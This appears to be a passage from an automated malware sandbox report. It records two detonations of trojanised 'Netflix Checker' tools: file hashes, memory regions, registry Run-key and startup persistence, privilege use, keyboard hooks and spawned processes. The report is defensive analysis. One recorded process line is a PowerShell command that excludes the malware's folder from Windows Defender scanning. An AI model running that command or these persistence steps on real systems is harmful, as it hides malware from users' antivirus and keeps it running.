memory/1076-140-0x0000000002F40000-0x0000000002F76000-memory.dmp
memory/1076-141-0x00000000059D0000-0x0000000005FF8000-memory.dmp
memory/1076-142-0x00000000059A0000-0x00000000059C2000-memory.dmp
memory/1076-144-0x0000000005390000-0x00000000053A0000-memory.dmp
memory/1076-143-0x0000000006170000-0x00000000061D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ibfsy5xe.brx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1076-151-0x0000000006250000-0x00000000062B6000-memory.dmp
memory/1076-150-0x0000000005390000-0x00000000053A0000-memory.dmp
memory/1076-156-0x0000000006860000-0x000000000687E000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4848-178-0x0000000006470000-0x00000000064E6000-memory.dmp
memory/4848-179-0x0000000006450000-0x000000000646E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/2488-194-0x00000000002E0000-0x00000000002F2000-memory.dmp
memory/1076-195-0x0000000007A00000-0x0000000007A32000-memory.dmp
memory/1076-196-0x000000006FA10000-0x000000006FA5C000-memory.dmp
memory/1076-206-0x0000000006E10000-0x0000000006E2E000-memory.dmp
memory/1076-208-0x000000007FBE0000-0x000000007FBF0000-memory.dmp
memory/2488-207-0x0000000004CA0000-0x0000000004CB0000-memory.dmp
memory/1076-209-0x00000000081B0000-0x000000000882A000-memory.dmp
memory/1076-210-0x0000000007B70000-0x0000000007B8A000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/4144-214-0x0000000000EC0000-0x0000000000ED2000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/1076-216-0x0000000007BE0000-0x0000000007BEA000-memory.dmp
memory/1076-219-0x0000000007DF0000-0x0000000007E86000-memory.dmp
memory/4144-220-0x0000000005750000-0x0000000005760000-memory.dmp
memory/1076-221-0x0000000007DA0000-0x0000000007DAE000-memory.dmp
memory/1076-222-0x0000000007EB0000-0x0000000007ECA000-memory.dmp
memory/1076-223-0x0000000007E90000-0x0000000007E98000-memory.dmp
memory/2488-226-0x0000000004CA0000-0x0000000004CB0000-memory.dmp
memory/4144-227-0x0000000005750000-0x0000000005760000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
32s
Max time network
24s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
Files
memory/660-133-0x0000000000BC0000-0x0000000000BD4000-memory.dmp
memory/660-134-0x0000000005B10000-0x00000000060B4000-memory.dmp
memory/660-135-0x0000000005450000-0x00000000054E2000-memory.dmp
memory/660-136-0x0000000005510000-0x000000000551A000-memory.dmp
memory/660-137-0x0000000005550000-0x0000000005560000-memory.dmp
memory/660-138-0x0000000006AD0000-0x0000000006B4E000-memory.dmp
memory/660-139-0x0000000005550000-0x0000000005560000-memory.dmp
memory/984-140-0x0000000002300000-0x0000000002336000-memory.dmp
memory/984-141-0x0000000004F80000-0x00000000055A8000-memory.dmp
memory/984-142-0x0000000004C50000-0x0000000004C72000-memory.dmp
memory/984-143-0x0000000004EF0000-0x0000000004F56000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ok4wnty2.nyg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/984-149-0x0000000005620000-0x0000000005686000-memory.dmp
memory/984-154-0x0000000004940000-0x0000000004950000-memory.dmp
memory/984-155-0x0000000004940000-0x0000000004950000-memory.dmp
memory/984-156-0x0000000005C30000-0x0000000005C4E000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/660-178-0x0000000006790000-0x0000000006806000-memory.dmp
memory/660-179-0x0000000006770000-0x000000000678E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/1700-194-0x0000000000FF0000-0x0000000001002000-memory.dmp
memory/984-195-0x0000000006DE0000-0x0000000006E12000-memory.dmp
memory/984-196-0x000000006FC90000-0x000000006FCDC000-memory.dmp
memory/984-206-0x00000000061E0000-0x00000000061FE000-memory.dmp
memory/1700-207-0x0000000005900000-0x0000000005910000-memory.dmp
memory/984-208-0x000000007F360000-0x000000007F370000-memory.dmp
memory/984-209-0x0000000004940000-0x0000000004950000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/984-213-0x0000000007590000-0x0000000007C0A000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/2140-216-0x00000000009C0000-0x00000000009D2000-memory.dmp
memory/984-215-0x0000000006F40000-0x0000000006F5A000-memory.dmp
memory/2140-219-0x0000000005290000-0x00000000052A0000-memory.dmp
memory/984-220-0x0000000006FB0000-0x0000000006FBA000-memory.dmp
memory/984-221-0x00000000071C0000-0x0000000007256000-memory.dmp
memory/984-222-0x0000000007170000-0x000000000717E000-memory.dmp
memory/984-223-0x0000000007280000-0x000000000729A000-memory.dmp
memory/984-224-0x0000000007260000-0x0000000007268000-memory.dmp
memory/1700-227-0x0000000005900000-0x0000000005910000-memory.dmp
memory/2140-228-0x0000000005290000-0x00000000052A0000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
32s
Max time network
24s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\Netflix Checker V3.1 by Centrix.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Netflix Checker V3.1 by Centrix.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Netflix Checker V3.1 by Centrix.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\Netflix Checker V3.1 by Centrix.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\Netflix Checker V3.1 by Centrix.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\bin.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\bin.exe"
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Users\Admin\AppData\Roaming\Netflix Checker V3.1 by Centrix.exe
"C:\Users\Admin\AppData\Roaming\Netflix Checker V3.1 by Centrix.exe"
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | automation.whatismyip.com | udp |
| N/A | 127.0.0.1:80 | tcp |
Files
memory/1632-133-0x0000000000350000-0x0000000000384000-memory.dmp
memory/1632-134-0x0000000004D80000-0x0000000004E1C000-memory.dmp
memory/1632-135-0x00000000053D0000-0x0000000005974000-memory.dmp
memory/1632-136-0x0000000004E20000-0x0000000004EB2000-memory.dmp
memory/1632-137-0x0000000004D30000-0x0000000004D3A000-memory.dmp
memory/1632-138-0x0000000005040000-0x0000000005096000-memory.dmp
memory/1632-139-0x0000000004FD0000-0x0000000004FE0000-memory.dmp
memory/2208-140-0x0000000000AD0000-0x0000000000AE4000-memory.dmp
memory/2208-141-0x00000000069F0000-0x0000000006A6E000-memory.dmp
memory/2208-142-0x00000000053A0000-0x00000000053B0000-memory.dmp
memory/2208-143-0x00000000053A0000-0x00000000053B0000-memory.dmp
memory/2668-145-0x00000000029D0000-0x0000000002A06000-memory.dmp
memory/2668-146-0x00000000055E0000-0x0000000005C08000-memory.dmp
memory/2668-147-0x0000000005430000-0x0000000005452000-memory.dmp
memory/2668-148-0x00000000054F0000-0x0000000005556000-memory.dmp
memory/2668-149-0x0000000005C80000-0x0000000005CE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p24rf2cs.wnj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2972-159-0x0000000000010000-0x0000000000026000-memory.dmp
memory/2972-160-0x000000001B450000-0x000000001B91E000-memory.dmp
memory/2972-161-0x000000001AE70000-0x000000001AF0C000-memory.dmp
memory/2668-162-0x0000000004FA0000-0x0000000004FB0000-memory.dmp
memory/2668-163-0x0000000004FA0000-0x0000000004FB0000-memory.dmp
memory/2972-164-0x0000000000A80000-0x0000000000A90000-memory.dmp
memory/2668-165-0x0000000006300000-0x000000000631E000-memory.dmp
memory/2972-166-0x000000001AF10000-0x000000001AF18000-memory.dmp
memory/2668-169-0x0000000004FA0000-0x0000000004FB0000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/2208-189-0x0000000006650000-0x00000000066C6000-memory.dmp
memory/2972-190-0x000000001DDE0000-0x000000001DE86000-memory.dmp
memory/2208-191-0x0000000006630000-0x000000000664E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/1736-206-0x0000000000050000-0x0000000000062000-memory.dmp
memory/2668-208-0x00000000072E0000-0x0000000007312000-memory.dmp
memory/2668-209-0x000000006F990000-0x000000006F9DC000-memory.dmp
memory/2668-219-0x00000000068B0000-0x00000000068CE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Netflix Checker V3.1 by Centrix.exe
| MD5 | 4b34e6332bf3211d13b7f3b607fb8b80 |
| SHA1 | b895420fb0e314e2e84c16be1f15663329f24a59 |
| SHA256 | d996973a5abac35c645664dbef937ea7c2aa716108eb58916e5a57226c00cd7b |
| SHA512 | 800cbfc8fc75f3d5af157fc95f0a9ea72306dcb88084e6517319aec20760e997ed3352779e16c63da06fd820ee8af41a62433efe4fa0a856afe32f1d8d4cba50 |
C:\Users\Admin\AppData\Roaming\Netflix Checker V3.1 by Centrix.exe
| MD5 | 4b34e6332bf3211d13b7f3b607fb8b80 |
| SHA1 | b895420fb0e314e2e84c16be1f15663329f24a59 |
| SHA256 | d996973a5abac35c645664dbef937ea7c2aa716108eb58916e5a57226c00cd7b |
| SHA512 | 800cbfc8fc75f3d5af157fc95f0a9ea72306dcb88084e6517319aec20760e997ed3352779e16c63da06fd820ee8af41a62433efe4fa0a856afe32f1d8d4cba50 |
C:\Users\Admin\AppData\Roaming\Netflix Checker V3.1 by Centrix.exe
| MD5 | 4b34e6332bf3211d13b7f3b607fb8b80 |
| SHA1 | b895420fb0e314e2e84c16be1f15663329f24a59 |
